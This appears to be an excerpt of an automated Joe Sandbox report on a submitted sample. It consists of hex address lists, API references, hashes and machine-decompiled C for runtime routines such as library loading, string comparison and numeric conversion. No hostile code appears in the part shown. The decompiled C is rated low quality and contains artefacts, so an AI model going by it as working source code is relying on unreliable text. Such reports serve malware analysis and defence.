0x013da189
0x00000000
0x013da18f
0x013da193
0x013da197
0x013da19d
0x013da1a0
0x013da1a4
0x013da1a7
0x013da1ac
0x013da1ae
0x013da1ae
0x013da1b2
0x013da1b6
0x013da1bd
0x013da1c1
0x013da1c5
0x013da1c9
0x00000000
0x013da1cf
0x013da1cf
0x013da1cf
0x013da1d2
0x013da43f
0x013da44a
0x013da44d
0x013da451
0x013da453
0x00000000
0x00000000
0x00000000
0x00000000
0x013da1d8
0x013da1d8
0x013da1e0
0x013da1e2
0x013da459
0x013da463
0x00000000
0x013da1e8
0x013da1e8
0x013da1e8
0x013da1eb
0x013da1ed
0x013da1f1
0x013da1f5
0x013da1f9
0x013da1fb
0x013da200
0x013da208
0x013da208
0x013da20e
0x013da2da
0x013da2da
0x013da214
0x013da216
0x013da21a
0x013da21c
0x013da243
0x013da245
0x013da24b
0x013da24e
0x013da256
0x013da258
0x013da25a
0x00000000
0x00000000
0x013da228
0x013da22b
0x013da22f
0x013da237
0x013da23d
0x013da2d2
0x013da2d6
0x013da2d8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x013da23d
0x013da25e
0x013da262
0x013da264
0x013da264
0x013da266
0x013da26a
0x013da26e
0x013da271
0x013da273
0x013da276
0x013da276
0x013da27a
0x013da27e
0x013da282
0x013da284
0x013da286
0x013da2a2
0x013da2a2
0x013da2a7
0x013da2ab
0x013da290
0x013da294
0x013da294
0x013da2ad
0x013da2ad
0x013da2b1
0x013da2b1
0x013da297
0x013da29a
0x013da29a
0x013da320
0x013da325
0x013da328
0x013da32c
0x00000000
0x013da332
0x013da33c
0x013da341
0x013da344
0x013da346
0x013da34f
0x013da353
0x013da355
0x013da360
0x013da364
0x013da366
0x013da369
0x013da36d
0x013da36f
0x013da410
0x013da410
0x013da412
0x013da375
0x013da375
0x013da379
0x013da37d
0x013da37f
0x013da383
0x013da385
0x013da39f
0x013da39f
0x013da3a3
0x013da3a6
0x013da3ae
0x013da3b6
0x013da3bd
0x013da3bf
0x013da3c1
0x00000000
0x00000000
0x013da394
0x013da398
0x013da39b
0x013da39d
0x013da408
0x013da40c
0x013da40e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x013da39d
0x013da3c5
0x013da3c7
0x013da3cb
0x013da3cf
0x013da3d1
0x013da3d1
0x013da3d3
0x013da3d3
0x013da3d7
0x013da3d7
0x013da3db
0x013da3e2
0x013da3e2
0x013da3e2
0x013da3e2
0x013da3e5
0x013da3e8
0x013da3ed
0x013da3ed
0x013da3f4
0x013da3f8
0x013da3fb
0x00000000
0x013da3fb
0x013da32c
0x013da1e2
0x013da1d2
0x013da1c9
0x013da189
0x013da17f
0x013d9f32
0x013d9f32
0x013d9f35
0x013d9f37
0x013da0e9
0x013da0ee
0x013da0f2
0x013da0f5
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9f3d
0x013d9f3d
0x013d9f3f
0x013d9f41
0x013d9f58
0x013d9f5a
0x013d9f5f
0x013d9f62
0x00000000
0x00000000
0x013d9f48
0x013d9f4b
0x013d9f4e
0x013d9f50
0x013d9f52
0x013da46a
0x013da0fb
0x013da0fb
0x013da0ff
0x013da103
0x013da10b
0x013da114
0x013da116
0x013da119
0x013da11f
0x013da4a0
0x013da4a2
0x00000000
0x013da4a8
0x00000000
0x013da4a8
0x013da125
0x013da125
0x013da125
0x013da12a
0x00000000
0x013da12a
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9f52
0x013d9f64
0x013d9f64
0x013d9f68
0x013d9f6f
0x00000000
0x013d9f43
0x013d9f76
0x013d9f7e
0x013d9f80
0x00000000
0x013d9f82
0x013d9f82
0x013d9f86
0x013d9f8a
0x013d9f8d
0x013d9f8f
0x00000000
0x013d9f95
0x013d9f95
0x013d9f97
0x013da420
0x013da424
0x013da428
0x013da42b
0x013da42d
0x013da42e
0x013da42f
0x013da430
0x013d9b21
0x013d9b22
0x013d9b24
0x013d9b26
0x013d9b29
0x013d9b2d
0x013d9b31
0x013d9b35
0x013d9b3a
0x013d9b3e
0x013d9b40
0x013d9dd0
0x013d9dd8
0x00000000
0x013d9b46
0x013d9b46
0x013d9b49
0x013d9b4c
0x013d9b4e
0x013d9dc7
0x00000000
0x013d9b54
0x013d9b54
0x013d9d00
0x013d9d00
0x00000000
0x013d9b5a
0x013d9b5a
0x013d9b5c
0x013d9cf8
0x013d9cfa
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9b62
0x013d9b69
0x013d9b70
0x013d9b70
0x013d9b72
0x013d9b7a
0x013d9b7c
0x013d9c20
0x013d9c20
0x013d9c23
0x013d9c25
0x00000000
0x013d9c27
0x013d9c27
0x013d9c2b
0x013d9c2f
0x013d9b90
0x013d9b93
0x013d9b99
0x013d9b9b
0x00000000
0x013d9ba1
0x013d9ba3
0x013d9ba8
0x013d9bac
0x013d9bae
0x013d9bb0
0x013d9d84
0x013d9d89
0x013d9d91
0x013d9d9a
0x013d9da6
0x013d9dab
0x013d9daf
0x00000000
0x013d9bb6
0x013d9bb6
0x013d9bb9
0x013d9bbb
0x013d9d34
0x013d9d3b
0x013d9d3f
0x013d9d41
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9bc1
0x013d9bc1
0x013d9cc8
0x013d9cc8
0x013d9ccc
0x013d9cd4
0x013d9cd6
0x00000000
0x013d9cdc
0x00000000
0x013d9cdc
0x013d9bc7
0x013d9bc7
0x013d9bc9
0x013d9cc0
0x013d9cc2
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9bcf
0x013d9bd3
0x013d9bda
0x013d9bde
0x013d9be0
0x013d9d47
0x013d9d4d
0x013d9d50
0x013d9d5a
0x013d9d63
0x013d9d6f
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9be0
0x013d9bc9
0x013d9bc1
0x013d9bbb
0x013d9bb0
0x013d9c35
0x013d9c35
0x013d9c35
0x013d9c37
0x013d9bf0
0x013d9bf0
0x013d9bf3
0x013d9bf6
0x013d9bf8
0x013d9bfc
0x013d9c00
0x013d9c02
0x00000000
0x013d9c04
0x013d9c0a
0x013d9c0c
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9c0c
0x013d9c39
0x013d9c39
0x013d9c3f
0x013d9c42
0x013d9c4c
0x013d9c55
0x013d9c61
0x013d9c66
0x013d9c68
0x013d9c6c
0x013d9c6e
0x00000000
0x013d9c70
0x013d9c70
0x013d9c75
0x013d9c78
0x013d9c7a
0x013d9d10
0x00000000
0x013d9c80
0x013d9c80
0x013d9ceb
0x013d9ced
0x00000000
0x013d9cef
0x00000000
0x013d9cef
0x013d9c82
0x013d9c82
0x013d9c84
0x0147aa5d
0x0147aa5d
0x00000000
0x013d9c8a
0x013d9c8a
0x013d9c8a
0x013d9c8f
0x013d9c8f
0x013d9c93
0x013d9c95
0x00000000
0x013d9c9b
0x013d9ca5
0x013d9ca7
0x00000000
0x013d9cad
0x013d9cad
0x013d9cb6
0x013d9cb6
0x013d9ca7
0x013d9c95
0x013d9c84
0x013d9c80
0x013d9c7a
0x013d9c6e
0x013d9c37
0x013d9c2f
0x00000000
0x013d9c12
0x013d9c12
0x013d9c16
0x013d9c18
0x013d9c18
0x00000000
0x013d9b82
0x013d9d20
0x013d9d23
0x013d9d29
0x013d9d29
0x013d9b7c
0x013d9b5c
0x013d9b54
0x013d9b4e
0x013d9f9d
0x013d9f9f
0x013d9fa1
0x00000000
0x013d9fa7
0x013d9fa7
0x013d9fc6
0x013d9fc8
0x013d9fca
0x013d9fcf
0x013d9fd1
0x00000000
0x00000000
0x013d9fb8
0x013d9fbb
0x013d9fbe
0x013d9fc0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9fc0
0x013d9fde
0x013d9fde
0x013d9fa1
0x013d9f97
0x013d9f8f
0x013d9f80
0x013d9f41
0x013d9f37
0x013d9e1b
0x013d9e1b
0x013d9e1b
0x013d9e1f
0x013d9e22
0x013d9e26
0x013d9e28
0x013da018
0x013da01b
0x013da01d
0x013da023
0x013da04d
0x013da059
0x013da05b
0x013da065
0x013da06a
0x013da06d
0x013da072
0x013da076
0x013da079
0x013da2c9
0x013da2c9
0x00000000
0x013da07f
0x013da081
0x013da084
0x013da087
0x013da2ec
0x00000000
0x013da08d
0x013da08d
0x00000000
0x013da093
0x013da093
0x013da096
0x013da2c0
0x013da2c3
0x00000000
0x00000000
0x00000000
0x00000000
0x013da09c
0x013da0a0
0x013da0a8
0x013da0ac
0x013da0b2
0x013da0bb
0x013da0c7
0x013da0cc
0x013da0d0
0x013da0d4
0x013da0d6
0x013da034
0x013da036
0x013da4b0
0x00000000
0x013da03c
0x013da03f
0x00000000
0x013da03f
0x013da0dc
0x013da0dc
0x00000000
0x013da0dc
0x013da0d6
0x013da096
0x013da08d
0x013da087
0x00000000
0x013da043
0x013da043
0x013da043
0x013da04d
0x00000000
0x013d9e2e
0x013d9e32
0x013d9e36
0x013d9e3a
0x013d9fe4
0x013d9fe6
0x013da00c
0x013da00c
0x013da00e
0x00000000
0x00000000
0x013d9ff7
0x013d9ff9
0x013d9ffd
0x013da000
0x013da004
0x013da30b
0x013da30f
0x013da315
0x00000000
0x013da315
0x013da00a
0x013da00a
0x00000000
0x013da00a
0x00000000
0x013da004
0x00000000
0x013d9e40
0x013d9e40
0x013d9e47
0x013d9e4b
0x013d9e4d
0x013da2fd
0x013da2fd
0x00000000
0x013d9e53
0x013d9e55
0x013d9e58
0x013d9e5b
0x013da494
0x00000000
0x013d9e61
0x013d9e61
0x00000000
0x013d9e67
0x013d9e67
0x013d9e6a
0x013da2f4
0x013da2f7
0x0147aa62
0x0147aa62
0x0147aa67
0x0147aa6c
0x0147aa71
0x0147aa76
0x013c14c0
0x013c14c3
0x013c14c4
0x013c14c6
0x013c14c9
0x013c14d0
0x013c14d6
0x013c14db
0x013c1550
0x013c1555
0x013c14dd
0x013c14dd
0x013c14df
0x013c14e6
0x013c14f2
0x013c14f5
0x013c14fa
0x013c1502
0x013c1505
0x013c1507
0x013c150a
0x013c150c
0x013c1514
0x013c1517
0x013c1519
0x013c1519
0x013c151c
0x013c1523
0x013c1525
0x013c152d
0x013c1534
0x013c1534
0x013c1536
0x013c1549
0x00000000
0x00000000
0x00000000
0x013d9e70
0x013d9e74
0x013d9e80
0x013d9e84
0x013d9e87
0x013d9e89
0x013d9f08
0x013d9f08
0x013d9f08
0x013d9e8b
0x013d9e8e
0x013d9e92
0x013d9e94
0x013d9e9c
0x013d9eb7
0x013d9eb7
0x013d9ec2
0x013d9ec4
0x013d9ecc
0x013d9ed6
0x013d9ee3
0x013d9eea
0x013d9eef
0x013d9ef3
0x013d9ef7
0x013d9ef9
0x00000000
0x00000000
0x013d9eac
0x013d9eae
0x013d9eb0
0x013d9eb3
0x013d9eb5
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9eb5
0x00000000
0x013d9eae
0x013d9efb
0x013d9efd
0x013d9eff
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9eff
0x013d9f0a
0x013d9f13
0x013d9f13
0x013d9e6a
0x013d9e61
0x013d9e5b
0x013d9e4d
0x013d9e3a
0x013d9e28
0x00000000

APIs

malloc.MSVCRT ref: 013DA13B
malloc.MSVCRT ref: 013DA158

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 3040953cfe35a7c208eb62af963f9c64070fa8020fe80559000a38fbf9c71ac2
Instruction ID: f15623d9b44d4613d6ac2d0da4bc069de8b0070e8a370baea97f997774545b31
Opcode Fuzzy Hash: 3040953cfe35a7c208eb62af963f9c64070fa8020fe80559000a38fbf9c71ac2
Instruction Fuzzy Hash: 8F129072A087068FC714CF19E18062AF7E6BFC8318F19896DE99997351D731ED09CB92

Uniqueness

Uniqueness Score: -1.00%

Function 013C14C0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 013C14D0
LoadLibraryA.KERNEL32 ref: 013C14E6
GetProcAddress.KERNEL32 ref: 013C1505
GetProcAddress.KERNEL32 ref: 013C1517

Strings

__register_frame_info, xrefs: 013C14FA
__deregister_frame_info, xrefs: 013C150C
libgcc_s_dw2-1.dll, xrefs: 013C14C9, 013C14DF

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: c357bc2df545f027c76a9655114e58dc00d57c943c8e79e752fba9644a3dbf2a
Instruction ID: 45e24f441ca58baf57ac3841e9323f0291d232f6a2e1ce1a0d05d3a7aa62ecd6
Opcode Fuzzy Hash: c357bc2df545f027c76a9655114e58dc00d57c943c8e79e752fba9644a3dbf2a
Instruction Fuzzy Hash: AE015EF5808204CFC210BF78AA4811EBFF4FB50619F86452ED6899B315D730C818DB92

Uniqueness

Uniqueness Score: -1.00%

Function 013EA6A0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212
stringCOMMON

Download Yara Rule

C-Code - Quality: 15%

			E013EA6A0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				char* _t49;
				intOrPtr _t52;
				char _t55;
				char* _t57;
				void* _t61;
				char* _t63;
				char* _t66;
				char* _t68;
				char* _t72;
				char* _t74;
				char* _t76;
				char* _t77;
				char* _t78;
				char* _t79;
				void* _t80;
				void* _t81;
				void* _t83;
				void* _t84;
				void* _t86;
				void* _t87;
				void* _t90;
				intOrPtr* _t92;
				char* _t93;
				char _t94;
				char* _t97;
				char* _t99;
				char* _t101;
				char* _t102;
				void* _t103;
				char* _t106;
				char* _t109;
				char* _t112;
				int _t114;
				char* _t117;
				char* _t118;
				char* _t119;
				intOrPtr _t121;
				intOrPtr _t126;
				char* _t127;
				void* _t128;
				void* _t132;
				char** _t133;
				char** _t134;
				char** _t135;
				char** _t136;

				_t92 = __ecx;
				_push(__edi);
				_t133 = _t132 - 0x1c;
				_t126 =  *__ecx;
				_t117 = _t133[0xc];
				_t49 = _t133[0xd];
				_t76 =  *(_t126 - 0xc);
				if(_t76 < _t117) {
					_t133[3] = _t76;
					_t133[2] = _t117;
					_t133[1] = "basic_string::compare";
					 *_t133 = "%s: __pos (which is %zu) > this->size() (which is %zu)";
					E01473530(__edi, __eflags);
					_push(_t117);
					_push(_t76);
					_t134 = _t133 - 0x14;
					_t52 =  *_t92;
					_t101 = _t134[8];
					_t93 = _t134[9];
					_t77 =  *(_t52 - 0xc);
					_t118 = _t134[0xb];
					__eflags = _t77 - _t101;
					if(__eflags < 0) {
						_t134[3] = _t77;
						_t134[2] = _t101;
						_t134[1] = "basic_string::compare";
						 *_t134 = "%s: __pos (which is %zu) > this->size() (which is %zu)";
						E01473530(__edi, __eflags);
						_push(__edi);
						_push(_t118);
						_push(_t77);
						_t135 = _t134 - 0x10;
						_t55 =  *_t93;
						_t102 = _t135[8];
						_t94 = _t135[9];
						_t78 =  *(_t55 - 0xc);
						__eflags = _t78 - _t102;
						if(__eflags < 0) {
							_t135[3] = _t78;
							_t135[2] = _t102;
							_t135[1] = "basic_string::compare";
							 *_t135 = "%s: __pos (which is %zu) > this->size() (which is %zu)";
							E01473530(__edi, __eflags);
							0;
							0;
							_push(_t126);
							_push(__edi);
							_push(_t118);
							_push(_t78);
							_t136 = _t135 - 0x1c;
							_t103 =  *_t94;
							_t119 = _t136[0xc];
							_t109 = _t136[0xf];
							_t79 =  *(_t103 - 0xc);
							_t127 = _t136[0x10];
							__eflags = _t79 - _t119;
							if(__eflags < 0) {
								_t136[3] = _t79;
								_t136[2] = _t119;
								_t136[1] = "basic_string::compare";
								 *_t136 = "%s: __pos (which is %zu) > this->size() (which is %zu)";
								_t57 = E01473530(_t109, __eflags);
								goto L22;
							} else {
								_t94 =  *(_t136[0xe]);
								_t57 =  *(_t94 - 0xc);
								__eflags = _t57 - _t109;
								if(__eflags < 0) {
									L22:
									_t136[3] = _t57;
									_t136[2] = _t109;
									_t136[1] = "basic_string::compare";
									 *_t136 = "%s: __pos (which is %zu) > this->size() (which is %zu)";
									E01473530(_t109, __eflags);
									0;
									0;
									_t106 =  *(_t136[1]) +  *((intOrPtr*)( *(_t136[1]) - 0xc));
									__eflags = _t106;
									 *_t94 = _t106;
									return _t94;
								} else {
									_t80 = _t79 - _t119;
									__eflags = _t80 - _t136[0xd];
									_t81 =  >  ? _t136[0xd] : _t80;
									_t61 = _t57 - _t109;
									__eflags = _t61 - _t127;
									_t128 =  <=  ? _t61 : _t127;
									__eflags = _t128 - _t81;
									_t63 =  <=  ? _t128 : _t81;
									__eflags = _t63;
									if(_t63 == 0) {
										L19:
										_t63 = _t81 - _t128;
										__eflags = _t63;
									} else {
										_t136[2] = _t63;
										_t136[1] =  &(_t109[_t94]);
										 *_t136 = _t103 + _t119;
										L013E43A0();
										__eflags = _t63;
										if(_t63 == 0) {
											goto L19;
										}
									}
									return _t63;
								}
							}
						} else {
							_t83 = _t78 - _t102;
							__eflags = _t83 - _t94;
							_t84 =  >  ? _t94 : _t83;
							_t97 =  *(_t135[0xa]);
							_t121 =  *((intOrPtr*)(_t97 - 0xc));
							__eflags = _t121 - _t84;
							_t112 =  <=  ? _t121 : _t84;
							__eflags = _t112;
							if(_t112 == 0) {
								L13:
								_t66 = _t84 - _t121;
								__eflags = _t66;
							} else {
								_t66 =  &(_t102[_t55]);
								_t135[2] = _t112;
								_t135[1] = _t97;
								 *_t135 = _t66;
								L013E43A0();
								__eflags = _t66;
								if(_t66 == 0) {
									goto L13;
								}
							}
							return _t66;
						}
					} else {
						_t86 = _t77 - _t101;
						__eflags = _t86 - _t93;
						_t87 =  >  ? _t93 : _t86;
						__eflags = _t118 - _t87;
						_t99 =  <=  ? _t118 : _t87;
						__eflags = _t99;
						if(_t99 == 0) {
							L8:
							_t68 = _t87 - _t118;
							__eflags = _t68;
						} else {
							_t134[2] = _t99;
							_t68 = _t52 + _t101;
							 *_t134 = _t68;
							_t134[1] = _t134[0xa];
							L013E43A0();
							__eflags = _t68;
							if(_t68 == 0) {
								goto L8;
							}
						}
						return _t68;
					}
				} else {
					_t90 =  >  ? _t49 : _t76 - _t117;
					 *_t133 = _t133[0xe];
					_t114 = strlen(??);
					_t72 =  <=  ? _t114 : _t90;
					if(_t72 == 0) {
						L3:
						_t74 = _t90 - _t114;
					} else {
						_t133[2] = _t72;
						_t74 = _t133[0xe];
						 *_t133 = _t126 + _t117;
						_t133[1] = _t74;
						L013E43A0();
						if(_t74 == 0) {
							goto L3;
						}
					}
					return _t74;
				}
			}

0x013ea6a0
0x013ea6a1
0x013ea6a4
0x013ea6a7
0x013ea6a9
0x013ea6ad
0x013ea6b1
0x013ea6b6
0x013ea700
0x013ea704
0x013ea708
0x013ea710
0x013ea717
0x013ea720
0x013ea723
0x013ea724
0x013ea727
0x013ea729
0x013ea72d
0x013ea731
0x013ea734
0x013ea738
0x013ea73a
0x013ea774
0x013ea778
0x013ea77c
0x013ea784
0x013ea78b
0x013ea790
0x013ea793
0x013ea794
0x013ea795
0x013ea798
0x013ea79a
0x013ea79e
0x013ea7a2
0x013ea7a5
0x013ea7a7
0x013ea7e7
0x013ea7eb
0x013ea7ef
0x013ea7f7
0x013ea7fe
0x013ea809
0x013ea80d
0x013ea810
0x013ea811
0x013ea812
0x013ea813
0x013ea814
0x013ea817
0x013ea819
0x013ea81d
0x013ea821
0x013ea824
0x013ea828
0x013ea82a
0x013ea87c
0x013ea880
0x013ea884
0x013ea88c
0x013ea893
0x00000000
0x013ea82c
0x013ea830
0x013ea832
0x013ea835
0x013ea837
0x013ea898
0x013ea898
0x013ea89c
0x013ea8a0
0x013ea8a8
0x013ea8af
0x013ea8ba
0x013ea8be
0x013ea8c8
0x013ea8c8
0x013ea8cb
0x013ea8cd
0x013ea839
0x013ea839
0x013ea83b
0x013ea83f
0x013ea844
0x013ea846
0x013ea848
0x013ea84d
0x013ea84f
0x013ea852
0x013ea854
0x013ea86e
0x013ea870
0x013ea870
0x013ea856
0x013ea85a
0x013ea85e
0x013ea862
0x013ea865
0x013ea86a
0x013ea86c
0x00000000
0x00000000
0x013ea86c
0x013ea879
0x013ea879
0x013ea837
0x013ea7a9
0x013ea7a9
0x013ea7ab
0x013ea7ad
0x013ea7b4
0x013ea7b8
0x013ea7bb
0x013ea7bd
0x013ea7c0
0x013ea7c2
0x013ea7da
0x013ea7dc
0x013ea7dc
0x013ea7c4
0x013ea7c4
0x013ea7c6
0x013ea7ca
0x013ea7ce
0x013ea7d1
0x013ea7d6
0x013ea7d8
0x00000000
0x00000000
0x013ea7d8
0x013ea7e4
0x013ea7e4
0x013ea73c
0x013ea73c
0x013ea73e
0x013ea740
0x013ea743
0x013ea747
0x013ea74a
0x013ea74c
0x013ea768
0x013ea76a
0x013ea76a
0x013ea74e
0x013ea74e
0x013ea756
0x013ea758
0x013ea75b
0x013ea75f
0x013ea764
0x013ea766
0x00000000
0x00000000
0x013ea766
0x013ea771
0x013ea771
0x013ea6b8
0x013ea6bc
0x013ea6c3
0x013ea6cb
0x013ea6d1
0x013ea6d6
0x013ea6f2
0x013ea6f4
0x013ea6d8
0x013ea6d8
0x013ea6dc
0x013ea6e2
0x013ea6e5
0x013ea6e9
0x013ea6f0
0x00000000
0x00000000
0x013ea6f0
0x013ea6fd
0x013ea6fd

APIs

strlen.MSVCRT ref: 013EA6C6
memcmp.MSVCRT ref: 013EA6E9
memcmp.MSVCRT ref: 013EA75F
memcmp.MSVCRT ref: 013EA7D1

Part of subcall function 01473530: strlen.MSVCRT ref: 0147353E

memcmp.MSVCRT ref: 013EA865

Strings

basic_string::compare, xrefs: 013EA708, 013EA77C, 013EA7EF, 013EA884, 013EA8A0
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 013EA710, 013EA784, 013EA7F7, 013EA88C, 013EA8A8

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 814b6a408fc0427e2585adf745401eb354b2c0655973ab6f7ef8b902a7599ade
Instruction ID: 04f9297f5e76b5ce341872b017512253b423d49f54218efefc369edb7e585428
Opcode Fuzzy Hash: 814b6a408fc0427e2585adf745401eb354b2c0655973ab6f7ef8b902a7599ade
Instruction Fuzzy Hash: 186147716093119FC304EF6ED88841EFBE5FFD8658F95892EE48987360E331D8408B56

Uniqueness

Uniqueness Score: -1.00%

Function 013E04F0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 1488
COMMONCrypto

Download Yara Rule

C-Code - Quality: 22%

			E013E04F0(void* __fp0) {
				signed int _t643;
				signed int _t651;
				intOrPtr* _t652;

				_t651 =  *( *(_t652 + 0xac));
				 *( *(_t652 + 0xac)) = _t651 & 0xffffffcf;
				_t643 = _t651 & 0x00000007;
				if(_t643 > 4) {
					return 0;
				}
				switch( *((intOrPtr*)(_t643 * 4 +  &M014ACCE0))) {
					case 0:
						L3:
						 *( *(_t652 + 0xb8)) = 1;
						 *(_t652 + 8) = 1;
						 *((intOrPtr*)(_t652 + 4)) =  *((intOrPtr*)(_t652 + 0xbc));
						 *_t652 = 0x14accdd;
						return E013E0230();
					case 1:
						__eax = __esp[0x28];
						__edx = 0;
						__ebp =  *(__esp[0x28]);
						__eflags = __ebp - 0x20;
						if(__ebp > 0x20) {
							__eax = 0x20;
							do {
								__eax = __eax + __eax;
								__edx = __edx + 1;
								__eflags = __ebp - __eax;
							} while (__ebp > __eax);
						}
						__eax = E013E2CD0(__edx);
						__edx = __esp[0x2a];
						__ebx = __eax;
						__eax = __ebp - 1;
						_t20 = __ebx + 0x14; // 0x14
						__ecx = _t20;
						__eax = __ebp - 1 >> 5;
						__esp[4] = __ecx;
						__edx = __esp[0x2a] + (__ebp - 1 >> 5) * 4;
						__eax = __esp[0x2a];
						__esi = __ecx;
						goto L11;
						while(1) {
							L14:
							_t27 = __eax - 1; // 0xf
							__esi = _t27;
							__edx =  *(__ebx + 0x14 + __esi * 4);
							__eflags = __edx;
							if(__edx != 0) {
								asm("bsr edx, [ebx+eax*4+0x10]");
								 *(__ebx + 0x10) = __eax;
								__eax = __eax << 5;
								__esi = __eax;
								__esi = __eax - __edx;
								__eflags = __esi;
								break;
							}
							__eax = __esi;
							__eflags = __esi;
							if(__esi == 0) {
								 *(__ebx + 0x10) = 0;
							} else {
								continue;
							}
							break;
						}
						__eax = E013E2740(__ebx);
						__edx = __esp[0x29];
						__esp[0x1f] = __eax;
						__esp[0xe] = __esp[0x29];
						__eflags = __eax;
						if(__eax != 0) {
							__eax = E013E2630(__ebx, __eax);
							__eax = __esp[0x1f];
							__esp[0x29] = __esp[0x29] + __eax;
							__esi = __esi - __eax;
							__esp[0xe] = __esp[0x29] + __eax;
						}
						__ecx =  *(__ebx + 0x10);
						__eflags =  *(__ebx + 0x10);
						if( *(__ebx + 0x10) == 0) {
							 *_t652 = _t649;
							E013E2DC0();
							goto L3;
						} else {
							 &(__esp[0x1f]) = E013E3580(__ebx,  &(__esp[0x1f]));
							__ecx = __esp[0xe];
							__esp[4] = __fp0;
							__edx = __esp[5];
							__eax = __esp[4];
							__ecx = __esp[0xe] + __esi;
							__edx = __esp[5] & 0x000fffff;
							__esp[8] = __esp[4];
							__eax = 1;
							__edx = __esp[5] & 0x000fffff | 0x3ff00000;
							__esp[7] = __ecx;
							__ecx = __ecx - 1;
							__eax = 1 - __esp[7];
							__esp[9] = __edx;
							__fp0 = __esp[8];
							__eflags = __ecx;
							__fp0 = __esp[8] -  *0x14accf4;
							__esp[4] = __ecx;
							__eax =  >=  ? __ecx : 1 - __esp[7];
							(__esp[8] -  *0x14accf4) *  *0x14accf8 = (__esp[8] -  *0x14accf4) *  *0x14accf8 +  *0x14acd00;
							__eax = ( >=  ? __ecx : 1 - __esp[7]) - 0x435;
							asm("fild dword [esp+0x10]");
							__fp0 = ((__esp[8] -  *0x14accf4) *  *0x14accf8 +  *0x14acd00) *  *0x14acd08;
							asm("faddp st1, st0");
							__eflags = 1;
							if(1 > 0) {
								__esp[4] = __eax;
								asm("fild dword [esp+0x10]");
								__fp0 = __fp0 *  *0x14acd10;
								asm("faddp st1, st0");
							}
						}
						asm("fnstcw word [esp+0x6e]");
						__eax = __esp[0x1b] & 0x0000ffff;
						__ah = __ah | 0x0000000c;
						__eflags = __ah;
						__esp[0x1b] = __ax;
						asm("fldcw word [esp+0x6c]");
						asm("fist dword [esp+0x10]");
						asm("fldcw word [esp+0x6e]");
						asm("fldz");
						asm("fcomip st0, st1");
						if(__eflags > 0) {
							asm("fild dword [esp+0x10]");
							asm("fucomip st0, st1");
							st0 = __fp0;
							if(__eflags != 0 || __eflags != 0) {
								__esp[4] = __esp[4] - 1;
							}
						} else {
							st0 = __fp0;
						}
						__ecx = __ecx << 0x14;
						__eax = (__ecx << 0x14) + __edx;
						__esp[9] = (__ecx << 0x14) + __edx;
						__eax = __esi;
						__eax = __esi - __ecx;
